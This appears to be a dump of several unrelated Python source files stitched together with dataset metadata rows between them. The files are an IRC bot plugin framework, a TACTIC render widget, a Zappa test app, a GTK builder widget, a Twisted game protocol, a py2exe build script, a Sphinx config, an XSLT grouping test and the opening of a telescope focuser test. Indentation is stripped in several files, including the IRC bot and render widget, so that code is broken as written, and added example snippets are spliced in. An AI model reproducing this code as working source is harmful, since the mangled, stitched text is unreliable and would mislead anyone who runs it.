# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>
#===============================================================================
from irc.clients import Client
from irc.structures import Server
from irc.events import Events
from irc.connections import IRCError
from threading import Thread
import itertools
import logging
import os
log = logging.getLogger(__name__)
class Plugin(object):
"""Abstract class, which initializes every plugin to have the essentials:
* a name
* a link to the ircbot
* the path to the common shelf (for serialized objects).
"""
name = 'unnamed'
admin = False
def __init__(self, ircbot):
self.ircbot = ircbot
self.shelf_path = os.path.join(ircbot.data_path, 'shelf.db')
try:
self.load()
except NotImplementedError:
pass
def load(self):
raise NotImplementedError
class CommandPlugin(Plugin):
"""Abstract Plugin to be used for commands."""
class Action(object):
PRIVMSG = staticmethod(lambda bot: bot.privmsg)
NOTICE = staticmethod(lambda bot: bot.notice)
def _process(self, connection, source, target, args):
result = self.process(connection, source, target, args)
if not result:
return
try:
action = result['action'](self.ircbot)
target = result['target']
message = result['message']
except KeyError:
log.error(u'Invalid plugin response.')
else:
if isinstance(message, basestring):
message = (message,)
for line in message:
try:
action(connection, target, line)
except IRCError as e:
log.error(e)
except Exception as e:
log.error('Unexpected exception occurred: %s' % e)
def process(self, connection, source, target, args):
raise NotImplementedError
def privmsg(self, target, message):
return {'action': self.Action.PRIVMSG,
'target': target,
'message': message
}
def notice(self, target, message):
return {'action': self.Action.NOTICE,
'target': target,
'message': message
}
class EventPlugin(Plugin):
"""Abstract Plugin to be used for events."""
def process(self, connection, source='', target='', args=None, message=''):
raise NotImplementedError
class IRCBot(Client):
"""Functional implementation of Client, which serves as an IRC bot as
opposed to a fully function client."""
def __init__(self, settings):
self.settings = settings
self.data_path = os.path.join(settings['base_path'],
settings['data_path'])
if not os.path.exists(self.data_path):
try:
os.mkdir(self.data_path)
except OSError:
raise Exception('Unable to create data directory.')
self._register_loggers()
self.pid_path = os.path.join(self.data_path, settings['pid_filename'])
self._save_pid(self.pid_path)
self.admins = {}
self.initial_channels = {}
servers = []
for server in settings['servers']:
irc_server = Server(server['host'], server['port'], server['nick'],
owner=server['owner'], name=server['name'],
use_ssl=server['ssl'])
servers.append(irc_server)
self.admins[irc_server] = server['admins']
self.initial_channels[irc_server] = server['channels']
self.plugin_path = settings['plugin_path']
event_plugins = {}
for event in settings['event_plugins']:
if 'plugins' not in event:
continue
name = getattr(Events, event['name'])
plugins = []
for plugin in event['plugins']:
split_path = plugin.split('.')
plugin_name = split_path.pop()
module_path = '.'.join(split_path)
module = __import__('%s.%s' % (self.plugin_path, module_path))
for part in split_path:
module = getattr(module, part)
plugins.append(getattr(module, plugin_name)(self))
event_plugins[name] = plugins
super(IRCBot, self).__init__(servers, event_plugins)
self.command_plugins = {}
self.command_prefix = settings['command_prefix']
self.version = settings['version_string']
self._restart = False
def _register_loggers(self):
root_logger = logging.getLogger('')
root_logger.setLevel(logging.DEBUG)
fh = logging.FileHandler(os.path.join(self.data_path,
self.settings['log_filename']),
encoding='utf-8')
fh_fmt = logging.Formatter("%(asctime)s - %(name)s - %(levelname)-8s: \
%(message)s")
fh.setFormatter(fh_fmt)
if self.settings['debug']:
ch = logging.StreamHandler()
ch_fmt = logging.Formatter("%(levelname)-8s - %(message)s")
ch.setFormatter(ch_fmt)
ch.setLevel(logging.DEBUG)
root_logger.addHandler(ch)
fh.setLevel(logging.DEBUG)
else:
fh.setLevel(logging.INFO)
root_logger.addHandler(fh)
def _save_pid(self, pid_path):
pid = os.getpid()
with open(pid_path, 'w') as pidfile:
pidfile.write(str(pid))
def _register_command_plugins(self):
items = self.settings['command_plugins'].iteritems()
for msg_type, command_plugins in items:
self.command_plugins[msg_type] = plugins = {}
if command_plugins is None:
continue
for command_plugin in command_plugins:
split_path = command_plugin['path'].split('.')
plugin_name = split_path.pop()
module_path = '.'.join(split_path)
module = __import__('%s.%s' % (self.plugin_path, module_path))
for part in split_path:
module = getattr(module, part)
commands = tuple(command_plugin['commands'])
plugins[commands] = getattr(module, plugin_name)(self)
log.debug('Loaded plugin "%s"!' % plugin_name)
def start(self):
super(IRCBot, self).start()
return self._restart
def restart(self):
self._restart = True
self.exit(message=u'Restarting!')
def register_command_plugin(self, command, plugin):
both = self.command_plugins['BOTH']
for commands in both.iterkeys():
if command in commands:
return False
self.command_plugins['BOTH'][(command,)] = plugin(self)
return True
def unregister_command_plugin(self, command):
commands = (command,)
both = self.command_plugins['BOTH']
for cmds in both.iterkeys():
if cmds == commands:
del both[cmds]
return True
return False
def on_connect(self, connection):
pass
def on_welcome(self, connection, source, target, message):
initial_channels = self.initial_channels[connection.server]
if initial_channels:
self.join(connection, *initial_channels)
def on_initial_connect(self):
self._register_command_plugins()
def is_admin(self, server, nick):
"""Returns whether a given nick is one of the administrators of the
bot."""
return nick in self.admins[server]
def get_version(self):
"""Returns the version of the bot."""
return self.version
def process_message(self, connection, source, target, message, is_pubmsg):
"""Processes a message, determining whether it is a bot command, and
taking action if it is."""
if message and message[0] == self.command_prefix:
if message[1:2] == u' ':
command = u' '
args = message[2:].strip().split(u' ')
else:
tokens = message[1:].strip().split(u' ')
command, args = tokens[0], tokens[1:]
both = self.command_plugins['BOTH'].iteritems()
if is_pubmsg:
either = self.command_plugins['PUBMSG'].iteritems()
else:
either = self.command_plugins['PRIVMSG'].iteritems()
for commands, plugin in itertools.chain(both, either):
if command in commands:
plugin._process(connection, source, target, args)
break
def _on_msg(self, connection, source, target, message, is_pubmsg):
process = Thread(target=self.process_message,
args=(connection, source, target, message,
is_pubmsg))
process.start()
def on_privmsg(self, connection, source, target, message):
self._on_msg(connection, source, source.nick, message, False)
def on_pubmsg(self, connection, source, target, message):
self._on_msg(connection, source, target, message, True)
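# Illustrative sketch (added; not part of the original module): a minimal command
# plugin built on the CommandPlugin API above.  The command name and reply text
# are arbitrary examples.
class EchoPlugin(CommandPlugin):
    """Replies with whatever arguments were passed to the command."""
    name = 'echo'
    def process(self, connection, source, target, args):
        # privmsg() builds the reply dict that _process() dispatches.
        return self.privmsg(target, u' '.join(args) if args else u'Nothing to echo!')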
|
gpl-3.0
| 7,017,456,056,481,446,000
| 34.771331
| 80
| 0.539929
| false
| 4.664441
| false
| false
| false
|
Southpaw-TACTIC/TACTIC
|
src/pyasm/prod/web/render_wdg.py
|
1
|
6716
|
###########################################################
#
# Copyright (c) 2005, Southpaw Technology
# All Rights Reserved
#
# PROPRIETARY INFORMATION. This software is proprietary to
# Southpaw Technology, and is not to be reproduced, transmitted,
# or disclosed in any way without written permission.
#
#
#
__all__ = [
'RenderException',
'SObjectRenderCbk',
'RenderTableElementWdg',
'RenderSubmitInfoWdg',
]
from pyasm.common import Container, TacticException, Config, Common
from pyasm.command import Command, CommandExitException
from pyasm.command.remote_command import XmlRpcExec, TacticDispatcher
from pyasm.checkin import SnapshotBuilder
from pyasm.search import SearchType, Search
from pyasm.web import Widget, WebContainer, DivWdg
from pyasm.widget import FunctionalTableElement, SelectWdg, IconWdg, IconSubmitWdg, CheckboxWdg, BaseInputWdg, HiddenWdg, TableWdg
from pyasm.biz import Snapshot
from pyasm.prod.biz import Layer, FrameRange, RenderPolicy
from pyasm.prod.render import *
class RenderException(Exception):
pass
from pyasm.command import DatabaseAction
class SObjectRenderCbk(DatabaseAction):
'''initiates a render with properties'''
def get_title(self):
return "Render Submission"
def check(self):
web = WebContainer.get_web()
if web.get_form_value("Render") == "" and web.get_form_value("do_edit").startswith("Submit/") == "":
return False
else:
return True
def execute(self):
web = WebContainer.get_web()
search_keys = []
# discovery phase to find the sobject to be rendered. This can be
# either a snapshots or sobjects. If it is an sobject, then
# the latest snapshot will be rendered
search_type = web.get_form_value("parent_search_type")
search_id = web.get_form_value("parent_search_id")
if search_type:
search_keys = ["%s|%s" % (search_type, search_id)]
if not search_keys:
if self.sobject:
search_keys = [self.sobject.get_search_key()]
else:
search_keys = web.get_form_values("search_key")
# get the policy
policy = None
if self.sobject:
policy_code = self.sobject.get_value("policy_code")
if policy_code:
policy = RenderPolicy.get_by_code(policy_code)
# render options
options = {}
keys = web.get_form_keys()
for key in keys:
if key.startswith("edit|"):
value = web.get_form_value(key)
new_key = key.replace("edit|", "")
options[new_key] = value
# add the xmlrpc server to the package:
# WARNING: not that there is no / separating the 2 %s.
client_api_url = web.get_client_api_url()
options['client_api_url'] = client_api_url
# go through each of the search keys found from the interface
for search_key in search_keys:
# find the sobject associates with this key
if not search_key:
continue
sobject = Search.get_by_search_key(search_key)
if not sobject:
raise TacticException("Search Key [%s] does not exist" % search_key)
# if the search_keys represented a snapshot, then use this as
# the snapshot and find the parent
if sobject.get_base_search_type() == "sthpw/snapshot":
snapshot = sobject
sobject = sobject.get_sobject()
else:
# else use the latest, assuming a context (really doesn't
# make much sense????!!!???
# FIXME: will deal with this later
context = "publish"
snapshot = Snapshot.get_latest_by_sobject(sobject, context)
if not snapshot:
raise TacticException("No checkins of context '%s' exist for '%s'. Please look at the chekin history" % (context, sobject.get_code()) )
# We provide a render package with a bunch of necessary information
render_package = RenderPackage()
render_package.set_policy(policy)
render_package.set_snapshot(snapshot)
render_package.set_sobject(sobject)
render_package.set_options(options)
# submission class
submit_class = self.get_option("submit")
if not submit_class:
submit_class = Config.get_value("services", "render_submit_class", no_exception=True)
if not submit_class:
submit_class = "pyasm.prod.render.RenderSubmit"
# now we have an sobject and a snapshot, we initiate a job
submit = Common.create_from_class_path(submit_class, [render_package])
# if this is from the EditWdg for queues then use this queue
# entry instead
if self.sobject.get_base_search_type() == "sthpw/queue":
submit.set_queue(self.sobject)
submit.execute()
self.description = "Submitted: %s" % ", ".join(search_keys)
class RenderTableElementWdg(FunctionalTableElement):
'''presents a checkbox to select for each sobject and executes a render'''
def get_title(self):
WebContainer.register_cmd("pyasm.prod.web.SObjectRenderCbk")
render_button = IconSubmitWdg("Render", IconWdg.RENDER, False)
return render_button
def get_display(self):
sobject = self.get_current_sobject()
search_key = sobject.get_search_key()
div = DivWdg()
checkbox = CheckboxWdg("search_key")
checkbox.set_option("value", search_key)
div.add(checkbox)
return div
class RenderSubmitInfoWdg(BaseInputWdg):
'''presents information about the render'''
def get_display(self):
web = WebContainer.get_web()
widget = Widget()
search_type = web.get_form_value("parent_search_type")
search_id = web.get_form_value("parent_search_id")
if not search_type:
widget.add("RenderSubmitInfo: parent type not found")
return widget
hidden = HiddenWdg("parent_search_type", search_type)
widget.add(hidden)
hidden = HiddenWdg("parent_search_id", search_id)
widget.add(hidden)
sobject = Search.get_by_id(search_type, search_id)
table = TableWdg(search_type, css="embed")
table.set_show_property(False)
table.set_sobject(sobject)
table.remove_widget("render")
table.remove_widget("description")
widget.add(table)
return widget
|
epl-1.0
| 7,091,345,297,028,031,000
| 31.444444
| 156
| 0.609738
| false
| 4.053108
| false
| false
| false
|
Miserlou/Zappa
|
tests/test_app.py
|
1
|
1055
|
from zappa.asynchronous import task
try:
from urllib.parse import parse_qs
except ImportError:
from cgi import parse_qs
try:
from html import escape
except ImportError:
from cgi import escape
def hello_world(environ, start_response):
parameters = parse_qs(environ.get('QUERY_STRING', ''))
if 'subject' in parameters:
subject = escape(parameters['subject'][0])
else:
subject = 'World'
start_response('200 OK', [('Content-Type', 'text/html')])
return ['''Hello {subject!s}
Hello {subject!s}!
'''.format(**{'subject': subject})]
def schedule_me():
return "Hello!"
@task
def async_me(arg1, **kwargs):
return "run async when on lambda %s%s" % (arg1, kwargs.get('foo', ''))
@task(remote_aws_lambda_function_name='test-app-dev', remote_aws_region='us-east-1')
def remote_async_me(arg1, **kwargs):
return "run async always on lambda %s%s" % (arg1, kwargs.get('foo', ''))
def callback(self):
print("this is a callback")
def prebuild_me():
print("this is a prebuild script")
|
mit
| -5,456,621,769,303,471,000
| 22.444444
| 84
| 0.651185
| false
| 3.370607
| false
| false
| false
|
awacha/cct
|
attic/gui/core/builderwidget.py
|
1
|
2464
|
import logging
from gi.repository import Gtk, Gdk, GdkPixbuf
from ...core.utils.callback import Callbacks, SignalFlags
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
class BuilderWidget(Callbacks):
__signals__ = {'destroy': (SignalFlags.RUN_FIRST, None, ())}
def __init__(self, gladefile: str, mainwidget: str):
super().__init__()
self.gladefile = gladefile
self.builder = Gtk.Builder.new_from_file(gladefile)
assert isinstance(self.builder, Gtk.Builder)
self.builder.set_application(Gtk.Application.get_default())
self.widget = self.builder.get_object(mainwidget)
assert isinstance(self.widget, Gtk.Widget)
self.builder.connect_signals(self)
self._mainwidget_connections = [self.widget.connect('map', self.on_mainwidget_map),
self.widget.connect('unmap', self.on_mainwidget_unmap),
self.widget.connect('destroy', self.on_mainwidget_destroy)]
def on_mainwidget_destroy(self, widget: Gtk.Widget):
logger.debug('Destroying main widget: ' + self.gladefile)
self.emit('destroy')
logger.debug('Destroy signal emitted for BuilderWidget ' + self.gladefile)
self.cleanup()
return False
def on_mainwidget_map(self, widget: Gtk.Widget):
logger.debug('Mapping mainwidget for BuilderWidget ' + self.gladefile)
self.widget.foreach(lambda x: x.show_all())
return False
# noinspection PyMethodMayBeStatic
def on_mainwidget_unmap(self, widget: Gtk.Widget):
logger.debug('Unmapping mainwidget for BuilderWidget ' + self.gladefile)
return False
def cleanup(self):
for c in self._mainwidget_connections:
self.widget.disconnect(c)
self._mainwidget_connections = []
try:
self.widget = None
self.builder = None
except AttributeError:
pass
self.cleanup_callback_handlers()
def __del__(self):
logger.debug('Deleting a BuilderWidget.')
def on_close(self, widget, event=None):
self.widget.destroy()
def get_screenshot(self) -> GdkPixbuf.Pixbuf:
assert isinstance(self.widget, Gtk.Widget)
gdkwin = self.widget.get_window()
assert isinstance(gdkwin, Gdk.Window)
return Gdk.pixbuf_get_from_window(gdkwin, 0, 0, gdkwin.get_width(), gdkwin.get_height())
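# Illustrative sketch (added; not part of the original module): a minimal subclass
# wiring a Glade file to BuilderWidget.  The file name and widget id are placeholders.
# class ExampleWindow(BuilderWidget):
#     def __init__(self):
#         super().__init__('example.glade', 'example_main_window')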
|
bsd-3-clause
| -4,639,427,528,054,207,000
| 36.907692
| 99
| 0.640016
| false
| 3.874214
| false
| false
| false
|
google-code/acromania
|
amprotocol.py
|
1
|
3608
|
# Copyright 2009 Lee Harr
#
# This file is part of Acromania.
#
# Acromania is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Acromania is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Acromania. If not, see <http://www.gnu.org/licenses/>.
from twisted.protocols import basic
from twisted.internet import reactor
later = reactor.callLater
import amgame
import amplayer
import colors
import amdb
class AM(basic.LineReceiver, amgame.CMix):
'Twisted protocol. One is created for each client connection.'
delimiter = '\n'
def connectionMade(self):
'A new connection. Send out the MOTD.'
print "Got new client!"
player = self.gameserver.join(self)
self.player = player
self.motd()
def connectionLost(self, reason):
'Client has disconnected.'
print "Lost a client!"
self.gameserver.leave(self.player)
def leave(self):
self.transport.loseConnection()
def lineReceived(self, line):
'''Called each time a new line of input is received from the client.
'''
line = line.strip()
#print "received", repr(line)
if not line:
return
elif line.startswith('/'):
self.command(line[1:], self.player)
else:
msg = '%s: %s' % (colors.white(self.player.name), line)
self.gameserver.broadcast(msg)
def change_name(self, player, name):
if not name:
player.message('Usage: /nick <new name>')
return
elif amdb.exists(name) and not player.username==name:
msg = colors.red('Name "') + colors.white(name) + colors.red('" is reserved')
player.message(msg)
player.message('Login with /login <name> <password> if that is your account.')
return
if name not in self.gameserver.game.playernames():
orig = player.name
player.name = name
broadcast = self.gameserver.broadcast
broadcast('Player "%s" is now known as "%s"' % (colors.white(orig), colors.white(name)))
else:
player.message('Name "%s" already in use.' % colors.white(name))
def motd(self):
'Message of the day.'
lines = open('MOTD').readlines()
for line in lines:
self.message(line.rstrip())
def help(self, player):
'Show HELP file.'
lines = open('HELP.sa').readlines()
for line in lines:
self.message(line.rstrip())
def rules(self, player):
'Show RULES file.'
lines = open('RULES').readlines()
for line in lines:
player.message(line.rstrip())
def simessage(self, msg=''):
'Send simple line to client. Used before player has logged in.'
self.transport.write(msg + '\r\n')
def message(self, *args, **kw):
color = kw.get('color', True)
strs = map(str, args)
msg = ' '.join(strs)
msg = msg % colors.yes
self.transport.write(msg + '\r\n')
def game_over(self, player):
player.message('Game over. Type /new to start again.')
player.message()
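# Self-contained LineReceiver sketch (not part of Acromania; the Echo class,
# factory and port number 4000 are illustrative assumptions) showing the same
# pattern AM uses above: one protocol instance per client connection, with
# lineReceived() dispatching on the incoming text.
from twisted.internet import protocol

class Echo(basic.LineReceiver):
    delimiter = b'\n'

    def lineReceived(self, line):
        # Commands start with '/', everything else is echoed back.
        if line.startswith(b'/quit'):
            self.transport.loseConnection()
        else:
            self.sendLine(line)

class EchoFactory(protocol.Factory):
    def buildProtocol(self, addr):
        return Echo()

if __name__ == '__main__':
    reactor.listenTCP(4000, EchoFactory())
    reactor.run()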
|
gpl-3.0
| 1,931,519,000,349,934,800
| 28.818182
| 100
| 0.613359
| false
| 4.026786
| false
| false
| false
|
matthewbauer/Reggie
|
windows_build.py
|
1
|
2846
|
from distutils.core import setup
from py2exe.build_exe import py2exe
import os, os.path, shutil, sys
upxFlag = False
if '-upx' in sys.argv:
sys.argv.remove('-upx')
upxFlag = True
dir = 'distrib/windows'
print '[[ Freezing Reggie! ]]'
print '>> Destination directory: %s' % dir
sys.argv.append('py2exe')
if os.path.isdir(dir): shutil.rmtree(dir)
os.makedirs(dir)
# exclude QtWebKit to save space, plus Python stuff we don't use
excludes = ['encodings', 'doctest', 'pdb', 'unittest', 'difflib', 'inspect',
'os2emxpath', 'posixpath', 'optpath', 'locale', 'calendar',
'threading', 'select', 'socket', 'hashlib', 'multiprocessing', 'ssl',
'PyQt4.QtWebKit', 'PyQt4.QtNetwork']
# set it up
setup(
name='Reggie! Level Editor',
version='1.0',
description='Reggie! Level Editor',
windows=[
{'script': 'reggie.py',
'icon_resources': [(0,'reggiedata/win_icon.ico')]}
],
options={'py2exe':{
'includes': ['sip', 'encodings', 'encodings.hex_codec', 'encodings.utf_8'],
'compressed': 1,
'optimize': 2,
'ascii': True,
'excludes': excludes,
'bundle_files': 3,
'dist_dir': dir
}}
)
print '>> Built frozen executable!'
# now that it's built, configure everything
os.unlink(dir + '/w9xpopen.exe') # not needed
if upxFlag:
if os.path.isfile('upx.exe'):
print '>> Found UPX, using it to compress the executables!'
files = os.listdir(dir)
upx = []
for f in files:
if f.endswith('.exe') or f.endswith('.dll') or f.endswith('.pyd'):
upx.append('"%s/%s"' % (dir,f))
os.system('upx -9 ' + ' '.join(upx))
print '>> Compression complete.'
else:
print '>> UPX not found, binaries can\'t be compressed.'
print '>> In order to build Reggie! with UPX, place the upx.exe file into '\
'this folder.'
if os.path.isdir(dir + '/reggiedata'): shutil.rmtree(dir + '/reggiedata')
if os.path.isdir(dir + '/reggieextras'): shutil.rmtree(dir + '/reggieextras')
shutil.copytree('reggiedata', dir + '/reggiedata')
shutil.copytree('reggieextras', dir + '/reggieextras')
shutil.copy('license.txt', dir)
shutil.copy('readme.txt', dir)
print '>> Attempting to copy VC++2008 libraries...'
if os.path.isdir('Microsoft.VC90.CRT'):
shutil.copytree('Microsoft.VC90.CRT', dir + '/Microsoft.VC90.CRT')
print '>> Copied libraries!'
else:
print '>> Libraries not found! The frozen executable will require the '\
'Visual C++ 2008 runtimes to be installed in order to work.'
print '>> In order to automatically include the runtimes, place the '\
'Microsoft.VC90.CRT folder into this folder.'
print '>> Reggie has been frozen to %s!' % dir
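# Usage sketch, inferred from the argument handling at the top of this script
# (no other command-line flags are defined here):
#
#   python windows_build.py        # freeze Reggie! into distrib/windows
#   python windows_build.py -upx   # additionally compress .exe/.dll/.pyd files,
#                                  # provided upx.exe sits in the working directory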
|
gpl-2.0
| 7,492,280,498,728,124,000
| 32.707317
| 84
| 0.603654
| false
| 3.317016
| false
| false
| false
|
henrykironde/deletedret
|
docs/conf.py
|
3
|
7970
|
import sys
import sphinx_rtd_theme
from retriever.lib.defaults import ENCODING
encoding = ENCODING.lower()
from retriever.lib.defaults import VERSION, COPYRIGHT
from retriever.lib.scripts import SCRIPT_LIST, reload_scripts
from retriever.lib.tools import open_fw
from retriever.lib.repository import check_for_updates
def to_str(object, object_encoding=encoding):
return str(object).encode('UTF-8').decode(encoding)
# Create the .rst file for the available datasets
datasetfile = open_fw("datasets_list.rst")
datasetfile_title = """==================
Datasets Available
==================
"""
check_for_updates()
reload_scripts()
script_list = SCRIPT_LIST()
# write the title of dataset rst file
# ref:http://www.sphinx-doc.org/en/master/usage/restructuredtext/basics.html
datasetfile.write(datasetfile_title)
# get info from the scripts using specified encoding
for script_num, script in enumerate(script_list, start=1):
reference_link = ''
if script.ref.strip():
reference_link = script.ref
elif hasattr(script, 'homepage'):
reference_link = script.homepage
elif not reference_link.strip():
if bool(script.urls.values()):
reference_link = list(script.urls.values())[0].rpartition('/')[0]
else:
reference_link = 'Not available'
title = str(script_num) + ". **{}**\n".format(to_str(script.title.strip(), encoding))
datasetfile.write(title)
datasetfile.write("-" * (len(title) - 1) + "\n\n")
# keep the gap between : {} standard as required by restructuredtext
datasetfile.write(":name: {}\n\n".format(script.name))
# Long urls can't render well, embed them in a text(home link)
if len(to_str(reference_link)) <= 85:
datasetfile.write(":reference: `{}`\n\n".format(reference_link))
else:
datasetfile.write(":reference: `{s}'s home link <{r}>`_.\n".format(
s=script.name, r=to_str(reference_link).rstrip("/")))
datasetfile.write(":citation: {}\n\n".format(to_str(script.citation, encoding)))
datasetfile.write(":description: {}\n\n".format(to_str(script.description, encoding)))
datasetfile.close()
needs_sphinx = '1.3'
# Add any Sphinx extension module names here, as strings.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.napoleon']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
# source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Data Retriever'
copyright = COPYRIGHT
version = release = VERSION
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = []
# The reST default role (used for this markup: `text`) to use for all documents.
# default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
# add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
# add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
# show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
# modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'sphinx_rtd_theme'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
# html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
# html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
# html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
# html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
# html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
# html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
# html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
# html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
# html_additional_pages = {}
# If false, no module index is generated.
# html_domain_indices = True
# If false, no index is generated.
# html_use_index = True
# If true, the index is split into individual pages for each letter.
# html_split_index = False
# If true, links to the reST sources are added to the pages.
# html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
# html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
# html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
# html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
# html_file_suffix = None
# Output file base name for HTML help builder.
# -- Options for LaTeX output --------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
# 'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
# The name of an image file (relative to this directory) to place at the top of
# the title page.
# latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
# latex_use_parts = False
# If true, show page references after internal links.
# latex_show_pagerefs = False
# If true, show URL addresses after external links.
# latex_show_urls = False
# Documents to append as an appendix to all manuals.
# latex_appendices = []
# If false, no module index is generated.
# latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# If true, show URL addresses after external links.
# man_show_urls = False
# -- Options for Texinfo output ------------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
# Documents to append as an appendix to all manuals.
# texinfo_appendices = []
# If false, no module index is generated.
# texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
# texinfo_show_urls = 'footnote'
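# For reference, each generated entry in datasets_list.rst ends up shaped like
# the following (the dataset name, link and citation are made-up placeholders,
# not real retriever scripts):
#
#   1. **Example Dataset**
#   ----------------------
#
#   :name: example-dataset
#
#   :reference: `https://example.org/data`
#
#   :citation: Doe, J. (2020). Example Dataset.
#
#   :description: A made-up dataset used only to illustrate the layout.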
|
mit
| -5,806,422,816,114,753,000
| 30.88
| 90
| 0.692346
| false
| 3.740028
| false
| false
| false
|
Pikecillo/genna
|
external/4Suite-XML-1.0.2/test/Xml/Xslt/Borrowed/mb_20030223.py
|
1
|
2150
|
# a pretty straightforward Muenchian grouping test
from Xml.Xslt import test_harness
sheet_1 = """<?xml version="1.0" encoding="utf-8"?>
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:output method="html" indent="yes"/>
<xsl:key name="skills-by-mark" match="skill" use="@mark"/>
<xsl:template match="skills">
<table>
<!-- process a set consisting of the first skill element for each mark -->
<xsl:for-each select="skill[count(.|key('skills-by-mark',@mark)[1])=1]">
<tr>
<td><b><xsl:value-of select="concat(@mark,' skills:')"/></b></td>
<td>
<!-- process all skill elements having the current skill's mark -->
<xsl:for-each select="key('skills-by-mark',@mark)">
<xsl:value-of select="@name"/>
<xsl:if test="position()!=last()"><br/></xsl:if>
</xsl:for-each>
</td>
</tr>
</xsl:for-each>
</table>
</xsl:template>
</xsl:stylesheet>"""
source_1 = """<skills>
<skill mark="excellent" name="excellentskill"/>
<skill mark="excellent" name="excellent skill"/>
<skill mark="good" name="goodskill"/>
<skill mark="good" name="goodskill"/>
<skill mark="basic" name="basicskill"/>
<skill mark="basic" name="basicskill"/>
<skill mark="excellent" name="excellentskill"/>
<skill mark="good" name="goodskill"/>
<skill mark="basic" name="basicskill"/>
</skills>"""
expected_1 = """<table>
<tr>
<td><b>excellent skills:</b></td>
<td>excellentskill
<br>excellent skill
<br>excellentskill
</td>
</tr>
<tr>
<td><b>good skills:</b></td>
<td>goodskill
<br>goodskill
<br>goodskill
</td>
</tr>
<tr>
<td><b>basic skills:</b></td>
<td>basicskill
<br>basicskill
<br>basicskill
</td>
</tr>
</table>"""
def Test(tester):
source = test_harness.FileInfo(string=source_1)
sheet = test_harness.FileInfo(string=sheet_1)
test_harness.XsltTest(tester, source, [sheet], expected_1,
title='ordinary Muenchian grouping with keys')
return
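# A quick way to run the same transform outside the 4Suite test harness, using
# lxml (an assumption -- the original test only relies on Xml.Xslt.test_harness):
def run_with_lxml():
    from lxml import etree
    stylesheet = etree.fromstring(sheet_1.encode('utf-8'))
    document = etree.fromstring(source_1.encode('utf-8'))
    transform = etree.XSLT(stylesheet)
    return str(transform(document))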
|
gpl-2.0
| 4,578,644,373,810,415,600
| 28.452055
| 80
| 0.583256
| false
| 3.199405
| true
| false
| false
|
AstroHuntsman/POCS
|
pocs/tests/test_focuser.py
|
1
|
4299
|
import pytest
from pocs.focuser.simulator import Focuser as SimFocuser
from pocs.focuser.birger import Focuser as BirgerFocuser
from pocs.camera.simulator import Camera
from pocs.utils.config import load_config
params = [SimFocuser, BirgerFocuser]
ids = ['simulator', 'birger']
# Ugly hack to access id inside fixture
@pytest.fixture(scope='module', params=zip(params, ids), ids=ids)
def focuser(request):
if request.param[0] == SimFocuser:
# Simulated focuser, just create one and return it
return request.param[0]()
else:
# Load the local config file and look for focuser configurations of the specified type
focuser_configs = []
local_config = load_config('pocs_local', ignore_local=True)
camera_info = local_config.get('cameras')
if camera_info:
# Local config file has a cameras section
camera_configs = camera_info.get('devices')
if camera_configs:
# Local config file camera section has a devices list
for camera_config in camera_configs:
focuser_config = camera_config.get('focuser', None)
if focuser_config and focuser_config['model'] == request.param[1]:
# Camera config has a focuser section, and it's the right type
focuser_configs.append(focuser_config)
if not focuser_configs:
pytest.skip(
"Found no {} configurations in pocs_local.yaml, skipping tests".format(
request.param[1]))
# Create and return a Focuser based on the first config
return request.param[0](**focuser_configs[0])
@pytest.fixture(scope='module')
